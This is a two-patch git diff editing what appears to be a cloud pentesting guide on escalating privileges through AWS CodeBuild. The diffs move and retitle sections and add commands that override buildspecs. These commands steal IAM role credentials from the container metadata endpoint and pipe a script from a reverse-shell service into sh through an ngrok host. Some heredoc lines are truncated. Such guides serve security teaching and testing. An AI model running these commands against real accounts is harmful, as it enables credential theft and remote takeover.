From f9673cc3b53b5945658b45eda5451b29e9e5072b Mon Sep 17 00:00:00 2001
From: root
Date: Wed, 16 Oct 2024 14:55:19 +0200
Subject: [PATCH 1/2] Privisc page updated to improve understanding.
---
 .../aws-codebuild-privesc.md | 139 ++++++++++--------
 1 file changed, 79 insertions(+), 60 deletions(-)
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index 2c2c568596..07d00c5562 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -23,10 +23,69 @@ Get more info in: [aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
 {% endcontent-ref %}
+### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
+
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+
+{% tabs %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
+```bash
+cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```bash
+cat > hacktricks.yml < --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Note**: The difference between these two commands is that:
+- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
+- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+
 {% tabs %}
 {% tab title="Example1" %}
 ```bash
@@ -149,66 +208,27 @@ aws codebuild start-build --project-name codebuild-demo-project
 **Potential Impact:** Direct privesc to any AWS Codebuild role.
-### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
-
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
-
-{% tabs %}
-{% tab title="StartBuild" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-
-{% tab title="StartBuildBatch" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
-
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
-
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
{% tabs %}
-{% tab title="StartBuildBatch" %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
+# Enumerate then env and get creds
+REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
 # Get rev shell
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
-# You need to indicate the name of the project you want to modify
 JSON="{
- \"name\": \"codebuild_lab_3_project\",
+ \"name\": \"\",
 \"source\": {
 \"type\": \"NO_SOURCE\",
- \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
+ \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
 },
 \"artifacts\": {
 \"type\": \"NO_ARTIFACTS\"
@@ -221,32 +241,31 @@ JSON="{
 }
 }"
-printf "$JSON" > $REV_PATH
-
 # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
+printf "$JSON" > $REV_PATH
+
 aws codebuild update-project --cli-input-json file://$REV_PATH
-aws codebuild start-build-batch --project-name codebuild-demo-project
+aws codebuild start-build --project-name codebuild-demo-project
 ```
+{% endcode %}
 {% endtab %}
-{% tab title="StartBuild" %}
+{% tab title="StartBuildBatch" %}
 {% code overflow="wrap" %}
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
-# Enumerate then env and get creds
-REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-
 # Get rev shell
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+# You need to indicate the name of the project you want to modify
 JSON="{
- \"name\": \"\",
+ \"name\": \"codebuild_lab_3_project\",
 \"source\": {
 \"type\": \"NO_SOURCE\",
- \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
+ \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
 },
 \"artifacts\": {
 \"type\": \"NO_ARTIFACTS\"
@@ -259,16 +278,16 @@ JSON="{
 }
 }"
-# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
-
 printf "$JSON" > $REV_PATH
+# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!
+
 aws codebuild update-project --cli-input-json file://$REV_PATH
-aws codebuild start-build --project-name codebuild-demo-project
+aws codebuild start-build-batch --project-name codebuild-demo-project
 ```
-{% endcode %}
 {% endtab %}
+{% endcode %}
 {% endtabs %}
 **Potential Impact:** Direct privesc to attached AWS Codebuild roles.
@@ -319,7 +338,7 @@ aws codebuild start-build --project-name
 # Wait for the reverse shell :)
 ```
-You can use something like this **builspec** to get a **reverse shell**:
+You can use something like this **buildspec** to get a **reverse shell**:
 {% code title="buildspec.yml" %}
 ```yaml
From 222f9e173a3407625c318c35e2aed24387bfda33 Mon Sep 17 00:00:00 2001
From: root
Date: Wed, 16 Oct 2024 14:55:19 +0200
Subject: [PATCH 2/2] Privisc page updated to improve understanding.
---
 .../aws-codebuild-privesc.md | 137 ++++++++++--------
 1 file changed, 78 insertions(+), 59 deletions(-)
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index 2c2c568596..ed810ce783 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -23,10 +23,69 @@ Get more info in: [aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
 {% endcontent-ref %}
+### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
+
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+
+{% tabs %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
+```bash
+cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```bash
+cat > hacktricks.yml < --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Note**: The difference between these two commands is that:
+- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
+- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+
 {% tabs %}
 {% tab title="Example1" %}
 ```bash
@@ -149,66 +208,27 @@ aws codebuild start-build --project-name codebuild-demo-project
 **Potential Impact:** Direct privesc to any AWS Codebuild role.
-### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
-
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
-
-{% tabs %}
-{% tab title="StartBuild" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-
-{% tab title="StartBuildBatch" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
-
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
-
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
{% tabs %}
-{% tab title="StartBuildBatch" %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
+# Enumerate then env and get creds
+REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
 # Get rev shell
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
-# You need to indicate the name of the project you want to modify
 JSON="{
- \"name\": \"codebuild_lab_3_project\",
+ \"name\": \"\",
 \"source\": {
 \"type\": \"NO_SOURCE\",
- \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
+ \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
 },
 \"artifacts\": {
 \"type\": \"NO_ARTIFACTS\"
@@ -221,32 +241,31 @@ JSON="{
 }
 }"
-printf "$JSON" > $REV_PATH
-
 # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
+printf "$JSON" > $REV_PATH
+
 aws codebuild update-project --cli-input-json file://$REV_PATH
-aws codebuild start-build-batch --project-name codebuild-demo-project
+aws codebuild start-build --project-name codebuild-demo-project
 ```
+{% endcode %}
 {% endtab %}
-{% tab title="StartBuild" %}
+{% tab title="StartBuildBatch" %}
 {% code overflow="wrap" %}
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
-# Enumerate then env and get creds
-REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-
 # Get rev shell
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+# You need to indicate the name of the project you want to modify
 JSON="{
- \"name\": \"\",
+ \"name\": \"codebuild_lab_3_project\",
 \"source\": {
 \"type\": \"NO_SOURCE\",
- \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
+ \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\"
 },
 \"artifacts\": {
 \"type\": \"NO_ARTIFACTS\"
@@ -259,13 +278,13 @@ JSON="{
 }
 }"
-# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
-
 printf "$JSON" > $REV_PATH
+# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!
+
 aws codebuild update-project --cli-input-json file://$REV_PATH
-aws codebuild start-build --project-name codebuild-demo-project
+aws codebuild start-build-batch --project-name codebuild-demo-project
 ```
 {% endcode %}
 {% endtab %}
@@ -319,7 +338,7 @@ aws codebuild start-build --project-name
 # Wait for the reverse shell :)
 ```
-You can use something like this **builspec** to get a **reverse shell**:
+You can use something like this **buildspec** to get a **reverse shell**:
 {% code title="buildspec.yml" %}
 ```yaml